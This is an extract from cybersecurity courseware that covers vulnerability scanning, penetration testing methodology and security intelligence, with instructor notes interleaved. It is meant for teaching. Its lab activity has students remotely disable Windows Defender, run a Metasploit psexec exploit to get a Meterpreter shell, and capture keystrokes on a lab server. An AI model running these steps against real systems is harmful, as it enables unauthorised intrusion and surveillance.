• Choose one or more scanners that best fit the needs of your vulnerability management program.
• Identify any false positives in vulnerability scan results.
e
• Create exceptions for certain items in a vulnerability scan, when necessary.
at
• Use existing baselines and risk analysis to prioritize your response to detecting vulnerabilities.
• Reconcile scan results with what you know about your environment, and what you know about
the security landscape.
lic
ACTIVITY 6-3
Conducting Vulnerability Scans
Data File
e
/home/kali/vuln_report.xml
ut
Activity: Conducting
Before You Begin Vulnerability Scans
You'll be using your Kali Linux VM in this activity. You'll also be using the Greenbone Security This data file is a saved
ib
report of a successful
Assistant (GSA), a vulnerability scanning platform and web interface that runs on the Greenbone
scan. If students' scans
Vulnerability Management (GVM) scanning engine, formerly known as OpenVAS. fail or don't produce
tr
useful results, they can
Scenario import this file into GSA
is
Now that you have your vulnerability management plan in place, you'll want to initiate a and review it instead.
comprehensive vulnerability scan of your systems. You will begin by deploying Greenbone Security To import the saved
Assistant. Using GSA, you'll run a preliminary scan on your Windows Server® 2019 system to detect report, select
D
Scans→Reports and
any immediate issues that may conflict with your risk management strategy.
then the Upload report
button. Browse for the
This will show the progress of the GVM service as it initializes by continually printing log entries to
the terminal as they are written. It may take a few minutes for the GVM service to fully initialize and
be ready for use, so you'll use these logs to identify when it's ready.
lic
Note: If the command terminates and stops showing the log file, run it again.
You can also ignore any permissions errors written to the log.
up
c) When the log indicates the OSPd OpenVAS service is starting, press Ctrl+C to exit the log file.
D
ot
2.
a) From the top panel, select the Firefox ESR icon to open the web browser.
o
D
c) You are prompted that the certificate is invalid. Select Advanced, and then select Accept the Risk
and Continue.
e
ut
ib
tr
is
Note: In a production environment, you would give GSA a valid web certificate
D
to use.
d) At the login page, enter admin as the user name and Pa22w0rd as the password, and then select
Sign In.
or
e) Verify you are taken to the GSA dashboard.
e
at
lic
up
D
b) From the top-left of the page, select the New Task option.
N
o
D
c) In the New Task dialog box, in the Name text box, type Server Scan
d) Next to the Scan Targets drop-down list, select the Create a new target button.
e) In the New Target dialog box, in the Name text box, type Server
f) In the Hosts section, next to the Manual radio button, type the IP address of your Windows Server
machine.
g) Select Save.
h) Back in the New Task dialog box, verify that Server is listed in the Scan Targets drop-down list.
e
ut
ib
tr
is
D
4.
i) Select Save.
b) From the controls to the right of the scan name, select the Start button.
lic
up
D
a) When the Status changes to Done, select the number 1 next to Reports.
b) Observe the scanner results. The graph shows the number of vulnerabilities detected, categorized
by severity color.
e
Discuss some of these c) Select the link under the Date column.
ut
vulnerabilities with d) Select the Results tab to get a list of the identified vulnerabilities.
students. Do they think e) Select the link to a particular vulnerability to get more information on its impact and any suggested
these vulnerabilities remediation.
ib
need to be addressed,
or are some of them
false positives? How 6. When you fix the major vulnerabilities in a system, how can you ensure they
tr
could students are repaired?
remediate these
A: You can rerun the GSA scan and see if the vulnerabilities persist.
is
vulnerabilities?
7. Why would you not always be able to fix a vulnerability that GSA marks as
D
critical?
A: Answers may vary, but some vulnerabilities require software patching to fix them, and the
organization may not be able to update certain software. Some services may also be marked as
8.
or
critical vulnerabilities by GSA, but must be enabled on the host for a variety of reasons.
penetration tester focus their efforts on systems most likely to be insecure. The penetration tester
can actively exploit the vulnerabilities identified by GSA, demonstrating the impact of an attack if it
is not prevented.
up
TOPIC D
Conduct Penetration Testing
You have identified possible vulnerabilities within your organization's systems. Now you will
conduct penetration testing as part of the process to assess your organization's security posture.
e
Rules of Engagement (ROE)
ut
Scope is an integral part of your overall pen testing rules of engagement (ROE). The ROE Rules of Engagement
defines how a pen test will be executed, and what constraints will be in place. This provides the pen (ROE)
ib
tester with guidelines to consult as they conduct their tests, without having to constantly ask
management for permission to do something. It is crucial a pen tester does not exceed their
mandate under the ROE. Testers must use only those tools and techniques named in the contract,
tr
or they could face not only dismissal from the case, but also criminal charges.
is
Although each organization may construct their ROE differently, typical components in an ROE are
as follows.
Consider mentioning the
D
ROE Component Description example of pen testing
company Coalfire,
Introduction This component defines the purpose of the test, the scope of the test, any whose employees
Logistics
with the test. or
additional constraints to observe during the test, and the risks associated
This component identifies how the test will be carried out and by whom.
physically broke into a
courthouse in Iowa as
part of a pen test. Even
though state officials
e
Here you should list the contact information and roles of each tester. You authorized the test, the
also need to define the schedule of the test, where the test will physically local county arrested the
at
take place, and what tools you will be using in the test. employees. The county
downgraded the charges
Communication This component outlines how communication will take place, including from burglary to
lic
who will be notified of certain events, how to notify them, and when. trespassing, but did not
You should also plan for communication with a cybersecurity incident immediately drop the
response team (CSIRT) should a major incident occur as a result of the charges. Only later were
the charges dropped
up
test.
entirely.
Targets This component involves identifying exactly which systems and personnel The following article
will be targeted by the penetration test, including specific information discusses the Coalfire
about the function, purpose, and network address of each asset.
D
incident: https://
www.zdnet.com/article/
Execution This component enables you to create a more in-depth outline of each
charges-dropped-
specific test you plan on conducting, both technical and non-technical. against-penetration-
ot
This is where you should go into as much detail as you can to avoid any testers-who-broke-into-
ambiguity. courthouse/.
N
Reporting This component enables you to define how you will deliver the results of
your tests, the frequency of these reports, and to whom you will be
reporting.
o
Signatures You must have proof that management (generally a Chief Information
Security Officer [CISO], Chief Information Officer [CIO], or equivalent)
D
has authorized your penetration test and agrees to all your terms defined
previously. Signing the document also ensures a measure of non-
repudiation should something go wrong. It is not enough that just anyone
signs off on the pen test; you must be able to prove that people with the
proper authority have signed off on it.
e
after it has concluded.
• The red team consists of security professionals who are asked to conduct authorized attacks on
ut
the organization. The term "red team" is also used to refer to penetration testers in general, if no
other teams are defined.
• The blue team consists of security professionals who are asked to defend the organization
ib
against the authorized attacks in a penetration test. The term "blue team" is also used to refer to
general network defense and incident response personnel in a real-world context, rather than just
tr
for pen tests.
is
Occasionally, you'll need to work with a third party who will conduct penetration tests on your
D
systems rather than doing these tests in-house. The advantage of relying on a third party comes
from the fact that some attacks will be external and unpredictable, which is not necessarily
something you can replicate yourself. However, it may be your responsibility to keep this third party
or
grounded and following a strict ROE. In this case, you should ask yourself a few key questions:
• Has the third party agreed to a well-defined scope with the relevant constraints?
• Does the third party carefully document their approach to pen testing?
• Is there a third-party representative I can contact in case of an emergency?
e
• Does the third party carry liability insurance?
at
• Does the third party provide the credentials and professional experience of all their personnel?
• Does the third party keep track of all their testing actions in a log that can be analyzed?
lic
• Can the third party provide well-written reports at the end of the test?
Pen Test Frameworks There are frameworks that guide penetration testing, some of which target specific industries or
systems. The CHECK framework, for example, was established by the UK security group
Communications–Electronics Security Group (CESG) to ensure government agencies can
D
identify vulnerabilities to their confidentiality, integrity, and availability through testing of networks
and other systems. The Open Web Application Security Project (OWASP) provides knowledge to
the software development community for several different security practices, including pen testing.
ot
However, a de facto approach to penetration testing is outlined in the Open Source Security
Testing Methodology Manual (OSSTMM), and it has a primary goal of providing transparency.
N
The OSSTMM outlines every area of an organization that needs testing, as well as goes into details
about how to conduct the relevant tests.
Although your organization may choose to follow OSSTMM, there are other standards and
o
frameworks available in the field of penetration testing. The Penetration Testing Execution
Standard (PTES) was established in 2009 by industry experts to cover seven phases of a
D
penetration test, starting with pre-engagement interactions and ending with reporting. The PTES
also comes with an in-depth technical guide to supplement the main standard.
Another framework is CBEST, created by the British non-profit Council for Registered Ethical
Security Testers (CREST). CBEST is geared toward the financial sector and relies heavily on
threat intelligence, while focusing on persistent threats.
Another scheme for the certification of pen testers to ensure an appropriate level of skill is the
Tigerscheme, which is run and managed by the University of South Wales Commercial Services. It
provides a way for skills and experience to be formally recognized. Skills assessments leading to
certification are rigorous, and are based upon academic standards. It does not apply a theory-only
approach, other than at the entry level, but instead focuses on the successful demonstration of
applied knowledge.
Note: Before you undertake any penetration testing, make sure you obtain documented legal
authorization from the system's owner or legal custodian to conduct the test.
e
ut
Common Pen Test Phases
The basic phases of a penetration test remain the same for most frameworks: Common Pen Test
ib
1. Reconnaissance Phases
The tester must gather as much information as possible about the target organization and its
tr
systems. This is done before the actual attack and involves passive intelligence gathering tactics.
2. Scanning
is
The tester will begin actively scanning the systems they have identified in the first phase to
enumerate those systems. This gives the tester a more complete picture of the target.
D
3. Exploitation
This is where the tester begins their attack, targeting whatever vulnerabilities they have identified
in the previous phases.
4. Maintaining access
or
Once the tester breaches the organization's systems, they can install backdoors, rootkits, and
other exploits that enable them to maintain access in the future. This helps illustrate
e
vulnerabilities that can harm the organization over the long term, even after an active breach has
at
been identified.
5. Reporting
lic
The tester must conclude their operations by reporting their findings to the appropriate
personnel. The report is the primary deliverable of a pen test. Reports are vital in debriefing
these personnel on the vulnerabilities found in the test, the risks these vulnerabilities pose to the
organization, and any suggested ways to mitigate these problems. An executive summary that
up
managers can understand should be included, along with very specific technical results for the IT
staff.
D
ot
N
o
D
e
ut
ib
tr
is
Figure 6-6: The phases of a typical penetration test.
D
Pen Tester's Knowledge of the Target
Here you could start a When it comes to the first phase of the pen test—reconnaissance—there are three possible
discussion regarding the
trade-off between time/
cost vs. information
gleaned from these
approaches:
or
• The black box approach simulates an outside attacker who would know nothing about the
target. The pen tester must do their own reconnaissance.
• The white box approach simulates an inside attacker who would have extensive knowledge
e
tests.
about the target. The pen tester does not need to perform their own reconnaissance, as this is
at
provided to them.
Pen Test Scope It's important for your organization to define the scope of these tests before you begin. You need to
know exactly what you are and are not allowed to do. Otherwise, you may interrupt important
D
business processes that could in turn introduce unwanted, serious risk to the organization. Likewise,
not going far enough in your tests will limit their effectiveness, and you could potentially miss
significant vulnerabilities. Some of the limitations that define the scope of your tests can include:
ot
• When you are allowed to conduct the tests—both time and date.
• How often you are allowed to conduct tests.
• Knowing when to stop to prevent further disruption to the business.
o
D
security and IT tasks within their job description. Pen testers with the greatest variety and volume of
experience are likely the most skilled and are likely to offer deep insights into your security
problems. Furthermore, an external pen tester may be more objective than an internal one. They will
be less likely to have social connections within your organization or be influenced by your
organization's office politics. A pen tester with grievances might focus an attack on a particular
person's area of responsibility or might dismiss issues in a system managed by a friend.
On the other hand, there are also benefits to using only internal staff for your penetration testing. If
you already have someone on staff who has pen testing skills, it may be less expensive to have them
perform your pen testing than to hire an external consultant. Furthermore, if you use an external
e
pen tester, you are authorizing an external party to perform otherwise illegal attacks on your
ut
network. In the case of white box or grey box testing, you may be handing sensitive information
over to them before they even start testing. If you don't trust your pen tester, think carefully before
providing such critical access.
ib
In some cases, you may not have a choice; you may be required to take on an external pen tester as
required by regulations.
tr
Pen Testing Technique Categories
is
Some professionals organize pen testing techniques by category. These categories are: Pen Testing Technique
Categories
D
• Physical: As mentioned previously, this category of techniques targets hardware and other
physical assets, and occasionally includes social engineering.
• Technical: These techniques target computing processes. A technical vulnerability is one that a
database. or
computer can identify and mitigate against, such as an SQL injection dumping the contents of a
• Logical: These techniques also target computing processes, but logical vulnerabilities can only
be truly analyzed by humans. A computer is not necessarily equipped to assess the context of a
e
given situation. It may take a person to determine when a network log shows malicious activity
at
Note: Social engineering can span multiple categories. Whereas an attack like tailgating is
physical in nature, an attack like phishing can be considered operational in nature since it can
trick key personnel who have an impact on day-to-day business operations into causing harm to
up
those operations.
Consider asking
Pen Testing Techniques students if they have any
D
techniques to add,
The following are some of the most common and successful pen testing techniques you may choose based on their
to employ: experience or research.
• Exploitation of system and network vulnerabilities
ot
The primary technique employed by pen testers is to take advantage of a vulnerability in the
organization's systems. For example, you can execute code on a host that escalates user privileges
N
due to some flaw in the operating system. Or, you can execute unauthorized queries on a web
server that fails to properly validate input. There are many more such examples of system
exploitation.
o
• War driving
D
You can drive around your office building or other private facilities owned by the organization to
identify any broadcasting Wi-Fi signals. If any signals leak off premises and into a public space
like the roads outside, you can identify the wireless access points (WAPs) used by the
organization. This is helpful in the scanning phase.
• Eavesdropping
Eavesdropping can be done using software that is installed on a computer to track user actions,
or it can be done using a traditional audio recorder planted in a secret place. You should clearly
understand your test's scope and consider the ethics involved in eavesdropping on
communications before implementing this technique, as well as its legality based on your
jurisdiction.
• Network sniffing
Sniffing a network for its packets is useful in intercepting unencrypted data, which can reveal
vulnerabilities in the organization's network infrastructure.
• Physical security testing
All of the virtual security controls in the world won't do your organization much good if
e
someone can simply walk in and steal a laptop without being caught. It's important that you test
the efficacy of physical security protocols like access controls at doors, surveillance cameras, and
ut
placement of devices. Depending on the nature of these tests, you should consider informing law
enforcement before you run them; otherwise, the police won't know that "breaking in" to your
office building is actually part of an authorized test, and not a real crime.
ib
• Social engineering
Tactics such as dumpster diving and impersonation will likely reveal the human-centric
tr
vulnerabilities in your organization. Assessing the ease with which an attacker can trick
employees into breaking security protocols is important to your overall test. Like with
is
eavesdropping, deceiving people has ethical implications that you should be mindful of. You
don't want to undermine your employees' trust in you or their trust in coworkers.
D
Pen Testing Tools of the Trade
Pen Testing Tools of the
Trade or
A penetration tester's toolkit consists of a wide variety of tools, some of which are used in many
other security contexts. Pen testers look for tools that fulfill the different phases of pen testing,
especially those that provide reconnaissance/scanning and exploitation functionalities. Tools that
can maintain access and have good reporting capabilities are a plus, but not as essential.
e
The following table lists some of the more popular tools used by pen testers.
at
Tool Description
lic
Nmap This open source network scanning tool is one of the most popular, and
often comes with its GUI version, Zenmap. Nmap can help a pen tester
by scanning the status of network ports, enumerating host information
up
like its operating system, and identifying the IP addresses of all active
hosts on a network.
Nessus This vulnerability scanning tool can also assist a pen tester in identifying
D
the weaknesses in their targets. It also has port scanning and operating
system enumeration capabilities.
hping This open source spoofing tool provides a pen tester with the ability to
ot
John the Ripper This open source password cracking utility is one of the most popular,
and often comes with its GUI version, Johnny. John the Ripper can use a
number of cracking techniques like dictionary based, brute force, and
o
Cain & Abel This freeware password cracking utility also has the ability to use a
number of hashing algorithms to crack passwords in a variety of ways. It
also comes with many other hacking capabilities, including Address
Resolution Protocol (ARP) spoofing, network sniffing, recording Voice
over IP (VoIP) communications, and more.
Tool Description
Metasploit Framework An open source exploitation framework with a large library of exploits
available. Metasploit is meant to be modular, which helps penetration
testers adapt and write their own exploits and combine them with their
payload of choice. Metasploit can also integrate with a number of
scanning tools like Nmap, Nessus, and Nexpose.
Core Impact™ A proprietary exploitation framework developed by Core Security® that
provides an advanced platform for penetration testing. Along with
e
reconnaissance, scanning, and exploitation, Core Impact also comes with
ut
a robust reporting feature. However, at tens of thousands of dollars, Core
Impact may be too expensive for some organizations.
CANVAS A proprietary exploitation framework developed by Immunity that offers
ib
exploitation features similar to Core Impact. However, CANVAS does
not provide the same level of support for reconnaissance and scanning.
tr
CANVAS is less expensive, but will still run your organization several
thousands of dollars in licensing.
is
Kali Linux
D
Another essential pen testing tool is Kali Linux. Kali Linux™ is a free suite of open source tools Kali Linux
built into a custom Linux® distribution, maintained by the Offensive Security group. It is the
or
successor to BackTrack, a defunct Linux distribution maintained by Offensive Security, and like
BackTrack, Kali Linux has become somewhat of a de facto platform for many security
professionals.
Kali Linux is an operating system built specifically to be used by penetration testers, computer
e
forensic experts, and security auditors. It comes prepackaged with more than 300 different security
at
tools, almost all of which are open source, and many of them industry recognized. Such tools
include:
lic
• sqlmap, a tool that can enumerate and exploit flaws in SQL databases.
• Social-Engineer Toolkit, a framework for launching phishing, spoofing, and other social
engineering attacks.
o
D
e
ut
ib
tr
is
D
or
e
Figure 6-7: Tool categories in Kali Linux.
at
Kali Linux is also fully customizable, so you can construct a distribution with or without certain
tools to tailor it to your own needs. Installation images of Kali Linux come in 32-bit and 64-bit
lic
versions, as well as versions targeting the ARM architecture used by Google Chromebooks™,
Raspberry Pi® devices, and others. An Android™-specific distribution called Kali NetHunter
supports multiple devices.
up
Data Mining in the Public Numerous information sources for hackers are available through the web. A simple web search
Internet reveals links to various tools, methodologies, and lists of vulnerabilities. The web is publicly
Consider reminding available and does not discriminate. It is useful to both attackers and security specialists looking to
ot
Collected Archives its systems. For example, one might be able to connect with an attacker who is selling specific
(FOCA) tool. information and even access to a target.
o
Common tools, such as Google's search engine, can provide extremely detailed information for free
if you know where to find these tools and know how to use them. Various types of Google hacks
D
(really just advanced search queries) take advantage of Google's vast body of information and
advanced search capabilities to focus on very specific technical information that might be useful to a
pen tester. As a simple example, the Google search link: query operator enables you to find sites
that link to another site. For example, link:www.develetech.com produces a list of sites that link
to www.develetech.com. The site: operator limits a Google search to a particular site or domain.
The filetype: operator limits results to a specific file type. Google provides many other operators.
Used in combination, they can make quick work of searching for specific content in specific
locations.
For example, logging and configuration data that should not be exposed may easily be found this
way. A worst-case scenario for an organization (or a best-case from the perspective of an attacker)
might be a report from intrusion detection, vulnerability assessments, or penetration testing that just
happens to be residing in an exposed location.
Consider demonstrating
Google Hacking Database a site like https://
www.shodan.io and how
The Google Hacking Database (GHDB) at https://www.exploit-db.com/google-hacking- it can be used to access
database/ provides a list of techniques that might be useful to attackers or pen testers, including poorly secured online
e
search queries that can reveal such things as: devices.
• Footholds (can help a hacker gain a foothold on a web server).
ut
• Files containing user names.
• Files containing passwords.
ib
• Files containing useful information.
• Error messages that reveal too much information.
tr
• Sensitive directories (directories that should not be shared but are).
• Vulnerable files.
is
• Vulnerable servers.
• Web server detection (web server profiling information).
• Sensitive online shopping information.
D
• Network or vulnerability data.
• Pages containing login portals.
• Online devices, such as printers, cameras, and so forth.
or
• Servers with faulty applications, scripts, and so forth, which have known vulnerabilities.
e
Attack Surface Scanning and Mapping
at
Attack surface scanning and mapping is about looking at the system from an attacker's perspective Attack Surface Scanning
to identify: and Mapping
lic
The fewer the open pathways and the harder they are to open, the safer your systems are. These
pathways may include such things as web URLs and parameters, applications, scripts, functions,
unused or unsecured system services, application programming interfaces (APIs), web forms, plug-
D
ins, cookies, databases, open ports and sockets, and admin IDs and passwords.
Once an attacker gains access to a network, host, or system, they will commonly perform an Packet Manipulation for
enumeration attack to discover the next layer of attack targets. Enumeration means gathering a list Enumeration
N
of resources that are on that network, host, or system. These resources then become potential
subsequent targets further into the pen test. These resources might be such things as:
o
into place to prevent such requests. It may be possible to use packet manipulation to issue a request
and receive a response for the purpose of enumeration.
Packet Crafting
Packet Crafting An attacker or pen tester might want to enumerate all of the protections in place at a particular
location, such as rules in place on a firewall or IDS. One way to accomplish this is by methodically
staging a series of mock attacks, designed to see how the system responds to specific intrusions. An
attacker might use a technique called packet crafting to accomplish this. With packet crafting, the
e
attacker creates new packets from scratch (rather than capturing and modifying packets from
ut
existing traffic), which are custom built to trigger a response if a certain rule is in place but otherwise
go undetected.
ib
tr
is
D
or
e
at
lic
Password Attacks
Password Attacks There are several methods you can use to expose passwords in plaintext to test your systems'
D
security. These password attacks can be grouped into two categories: online and offline.
Online password attacks involve attempting to log in to a live system by guessing a user's password.
You can do this manually or with the help of automated tools. Either way, this type of attack can be
ot
very slow and unreliable, especially in systems that restrict the number of login attempts you can
make in a certain time period. You may end up being locked out of an account if you make too
many unsuccessful guesses. Repeated login attempts may also alert security staff to your actions,
N
hashes. This is more commonly referred to as password cracking. Offline cracking attempts do not
require that the tester interface live with an authentication system; instead, the tester simply hashes
D
password guesses and compares them to the actual password hashes they have stolen. Assuming you
possess these hashes, offline attacks are quicker and more reliable than online attacks. This is
especially true when you incorporate rainbow tables. Using rainbow tables dramatically reduces the
time needed to crack a password. The biggest limitations to any offline password attack are time and
processing power, and even then, they are more powerful than most online attacks.
Note: You can also use pass the hash techniques to crack user credentials during a pen test.
Note: On a Windows system, password hashes are stored in the SAM database within the
Registry at HKEY_LOCAL_MACHINE\SAM, which requires SYSTEM privileges to access.
On a Linux system, the hash files are located in the /etc/shadow file, which requires superuser
privileges to access.
e
Penetration Test Follow-Up
ut
Following a penetration test, you must identify assets that have been flagged as vulnerable, and you Penetration Test Follow-
must identify possible ways to remediate systems. Just as you do following an internal vulnerability Up
ib
assessment, use a risk management approach to methodically identify security and compliance risks
that you can accept or transfer, and others that you need to reduce or avoid. Be sure to involve
others in this process as required, such as those working in compliance and business roles.
tr
Implement corrections for each vulnerability. Once you have implemented your new configuration,
establish new reference baselines for configuration monitoring, update your documentation, and
is
follow up with any reporting required by regulatory compliance and your internal policies.
Note: If you hired a consultant, a remediation proposal may have been included in the report.
D
Guidelines for Conducting Penetration Testing
Follow these guidelines when conducting penetration testing.
or Guidelines for
Conducting Penetration
e
Conduct Penetration Testing Testing
at
• Identify weaknesses surrounding employees accessing the network through a virtual private
network (VPN).
• Follow up on the results of a pen test by sharing actionable findings with the organization.
N
o
D
ACTIVITY 6-4
Conducting Penetration Testing on Network
Assets
e
Before You Begin
ut
You'll be using your Kali Linux VM in this activity to attack your Windows Server 2019 computer.
Activity: Conducting
ib
Penetration Testing on Scenario
Network Assets
You've identified the vulnerabilities in your organization with the help of Greenbone Vulnerability
Management (GVM). Now it's time to exploit those vulnerabilities. You'll begin a penetration test
tr
on your network using Kali Linux. You decide to familiarize yourself with Metasploit, a well-known
tool included in Kali Linux. You'll be using Metasploit to open a remote shell onto a target server,
is
where you can execute privileged commands on the server. You also want to test out Armitage, a
GUI tool that can help you visualize the exploit more easily.
D
1. Turn off Windows Security on the server remotely.
-DisableRealtimeMonitoring $true'
Make sure to replace # with the last octet of your server's IP address.
The prompt should return if there were no errors in execution.
lic
You remotely executed a Windows PowerShell command that turns off the Windows Security
service. This is necessary because Windows Security identifies the payload you're about to use as
malicious and prevents it from working properly.
up
b) Enter msfconsole
e
ut
ib
tr
is
D
c) At the msf6 > prompt, enter search -h to display the search command options.
or
Note: This command is very useful if you know what you are looking for, but it
often returns too many results for browsing exploits.
You can use the –h flag with most Metasploit commands to see options for that command.
e
d) Enter search CVE-2021-26855
This searches the Common Vulnerabilities and Exposures (CVE) database for a particular
at
vulnerability in the Microsoft Exchange Server that enables remote code execution.
lic
up
D
ot
N
o
D
b) Enter db_nmap –A 10.39.5.0/24 to use Nmap from within Metasploit to discover and
enumerate hosts.
The –A flag combines host discovery, operating system detection, version detection, and traceroute.
c) When the scan finishes, observe the results of what Nmap was able to discover about each host.
e
ut
ib
tr
is
D
or
e
at
lic
Note: Nmap results are not always accurate. They may identify an incorrect
operating system running on a host, for example.
up
d) Enter hosts
Nmap has populated the hosts with the results of the Nmap scan, including information about each
one.
D
d) Enter set RHOST 10.39.5.#, where # is the last number in your Windows Server's IP address.
e) Enter set SMBPass Pa22w0rd
D
e
ut
ib
tr
is
Note: If no session was created, run the same command again. If this doesn't
work after a few tries, restart Metasploit, configure the same exploit as before,
D
and try executing it again.
c) A warning that the Metasploit RPC server is not started appears. Select Yes to start it.
When the graphic interface appears, the hosts in the top-right window are already populated
because of your earlier Nmap scan. The bottom window is a command line just like you used in the
last section. A list of exploits is listed on the left.
e
ut
ib
tr
is
D
or
e
d) Right-click the icon of your Windows Server 2019 (10.39.5.#) computer and select Scan.
Notice that in the bottom window, you are running a series of scans from the auxiliary section. You
at
could have run each of these on your own in the command line if you wanted.
e) Wait for the scans to complete, and then right-click your Windows Server icon again and select
Login→psexec.
lic
h) Select Launch.
The same attack you ran at the command line runs here. Notice that your server icon changes to
show it has been exploited.
i) Right-click your server icon and note the new Meterpreter menu with options for some of the
D
m) In Windows Server 2019, press some keys, and note that they appear in the Meterpreter terminal.
e
A: Answers will vary, but might include: use an intrusion detection system (IDS)/intrusion prevention
ut
system (IPS), use two-factor authentication for administrator accounts, limit the number of
administrator accounts, and ensure strong passwords.
ib
8. What other tools would work well with the Metasploit Framework in a
penetration testing environment?
tr
A: Answers might include vulnerability scanners such as Nessus, Rapid7, and so on; password
crackers like John the Ripper, Cain & Abel, Ncrack, and L0phtCrack; and Nmap and other port
is
scanners.
9. Close Armitage.
D
10.Re-enable Windows Security on the server.
Summary
In this lesson, you used various techniques to assess the organization's security posture, including
auditing, vulnerability management, and penetration testing. An effective assessment program
combines all of these techniques to identify ways in which the organization can improve its security.
Encourage students to
use the social What vulnerability assessment tools do you currently use or plan to use in your
networking tools organization?
e
provided on the CHOICE A: Answers will vary. Vulnerability scanners are a popular choice, and students may have a preference
ut
Course screen to follow for which specific tool they use, if they're given a choice. Other tools like protocol and packet
up with their peers after
analyzers are useful for assessing network-based behavior for vulnerabilities. For students who
the course is completed
regularly assess software-based vulnerabilities, a fuzzer is likely part of their toolset.
ib
for further discussion
and resources to support
continued learning.
Which pen testing techniques have you used and found to be effective?
A: Answers will vary, but will include any technique that enables you to discover unknown vulnerabilities
tr
or exploit a vulnerability. For example, war driving is helpful in the scanning phase, and network
sniffing is useful in intercepting unencrypted data. Assessing the ease with which an attacker can trick
is
employees into breaking a security protocol is important, but you must be careful about violating
employees' trust during the pen test. Eavesdropping, dumpster diving, and impersonation can reveal
D
human-centric vulnerabilities, but can also push ethical boundaries if your intentions are not well-
communicated ahead of time.
or
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
e
at
lic
up
D
ot
N
o
D
e
ut
Lesson Time: 2 hours, 45 minutes
ib
tr
is
Lesson Introduction
D
Even with the most thorough testing of a security infrastructure, at some point there will be
problems. You may be able to stop them as they occur and before they cause any damage,
or
or you may have to deal with investigation of an incident that you were unable to stop.
Having good security intelligence at all times will help you keep your systems secure or
make them secure again.
e
Lesson Objectives
at
TOPIC A
Deploy a Security Intelligence Collection and
Analysis Platform
The key to maintaining secure systems is obtaining information through a security intelligence
e
collection and analysis platform.
ut
Security Intelligence
ib
Security Intelligence The concept of security intelligence existed long before cybersecurity was a concern. Security
intelligence is the process through which data generated in the ongoing use of information systems
is collected, processed, integrated, evaluated, analyzed, and interpreted to provide insights into the
tr
evolving security status of those systems. Threat intelligence is also a part of security intelligence.
A comprehensive and effective security intelligence process can produce a variety of benefits for the
is
organization, such as:
• Faster detection and remediation of threats.
D
• Improved regulatory compliance.
• Reduction of fraud, theft, and data leakage.
or
• Reduction of effort needed to provide security and deal with fallout related to breaches.
• The ability to detect potential weaknesses before an exploit actually occurs.
e
The Challenge of Security Intelligence Collection
at
The Challenge of The primary goals of security intelligence collection are to gather data about everything happening in
Security Intelligence the system and identify security problems revealed by that data. While these goals are simple to state,
Collection implementing a solution is typically anything but simple.
lic
Challenge Description
up
Identifying what data is The first challenges of security intelligence collection are identifying and
relevant obtaining all data that should be analyzed. This information comes from a
wide variety of sources. In fact, any information source that reveals how
and by whom the system is being accessed may potentially provide
D
security intelligence. For example, system logs track the login activities of
users, access to network resources, traffic across network ports, and so
forth. All such information might be useful in providing security
ot
intelligence.
Processing data to The sheer volume of data may itself be challenging, and the data may
N
make it useful originate in a variety of different formats that may be hard to consolidate
and make uniform to enable easy analysis. Moving all data to a single
storage location for processing and analysis can also be challenging.
o
Producing actionable Once the data has been captured and normalized, significant effort may
D
Challenge Description
Time and effort needed Security intelligence tasks can be automated through individual tools or
to set up, configure, comprehensive solutions, such as security information and event
and maintain security management (SIEM), but some solutions may involve extensive scripting
tools or manual processing.
Keeping security data Many of the logs used in security intelligence collection contain
secure information that is useful not only to those protecting the organization's
e
information systems, but would also be useful to an attacker. By putting
systems and processes to collect security intelligence in place, you may
ut
actually create more potential problems.
Some exploits may be purposely designed to erase or modify logs to
cover their tracks. Organizations need to protect logs and monitoring
ib
systems from unauthorized access, alteration, or destruction, especially as
you add to the volume of information your systems collect.
tr
Security Intelligence Collection Lifecycle
is
Security intelligence collection is really about more than just collection, although collection is a big Security Intelligence
D
part of the process. Information regarding potential security problems is hidden within massive Collection Lifecycle
amounts of raw data produced as a byproduct through the ongoing use of your information systems.
The security intelligence collection lifecycle involves various steps you perform to not only collect
or
data, but also to process and analyze it so you can focus on the right data, which is formatted and
organized to provide you with security intelligence.
e
at
lic
up
D
ot
N
e
place. Security practitioners typically develop their own processes, toolkits, and preferences for
ut
performing security intelligence collection, but having a standard procedure and approach with
standard tools can help to ensure you aren't skipping important steps or missing critical information.
ib
Security Intelligence Collection Plan
tr
Security Intelligence The first step in planning for security intelligence collection is to determine what sort of intelligence
Collection Plan you want to obtain. Then identify hardware and software sources for collecting and monitoring
appropriate data, and verify that these sources will indeed provide you with all the information you
is
need.
There is a wide variety of potential data sources, some of which you may already capture, such as
D
certain operating system information and application logs. In other cases, you may need to enable
additional logging or tracking capabilities in advance to ensure you have the data you need. Some
sources are not based on logs but require alternative methods of investigation, such as network
or
topology and architecture information. You also need to consider the tools you're using to obtain
this information, as some tools may be more suited to certain parts of the network; for example, a
Server Message Block (SMB) mapping tool would be most effective in areas where network file
e
sharing is common or likely to take place.
Because the collection of some data—which may be critical for producing good intelligence—
at
requires advance planning and preparation, it is important to perform the planning step carefully and
think through your intelligence requirements in advance. In a large organization, this should be
lic
conducted as a unified effort across departments and functional groups to ensure the right data is
being collected.
up
obtain information vital in managing risk within the organization. CSM ensures all key assets and
risk areas are under constant surveillance by finely tuned systems that can detect a wide variety of
issues. Whether it's network traffic, internal and external communications, host maintenance, or
ot
business operations, a CSM architecture carefully tracks the many components that make up the
organization. Essentially, continuous monitoring can turn a reactive collection process into a
N
proactive one, enabling the organization to obtain security intelligence that is comprehensive,
accurate, up to date, and actionable.
Although the effective implementation and maintenance of a CSM capability is complex and time
o
consuming, the result is that systems are continually monitored for problems or potential problems,
and a response can often be crafted as soon as a problem is detected, minimizing or preventing
D
damage.
The United States and other governments are not only requiring that government and military
agencies adopt a program of CSM, but they are also encouraging civilian agencies to do the same.
The U.S. Department of Homeland Security created a program named Continuous Diagnostics
and Mitigation (CDM), which provides U.S. government agencies and departments with
capabilities and tools to "identify cybersecurity risks on an ongoing basis, prioritize these risks based
upon potential impacts, and enable cybersecurity personnel to mitigate the most significant
problems first."
What to Monitor
Security monitoring systems, including those that implement CSM, monitor a variety of items. What to Monitor
e
Vulnerabilities, A system may be vulnerable due to its configuration settings, buggy
configurations, and versions of software or device drivers, missing patches or updates,
ut
assets incorrect policy settings, inappropriate access controls, and so forth. By
collecting state information from your various systems and comparing it
ib
to acceptable baselines, you can determine if the systems are in a
vulnerable state.
Unfortunately, changes to configuration can happen at any time, and
tr
these changes may mean your systems are no longer secure. A user can
change settings or share files or directories on a computer. An
is
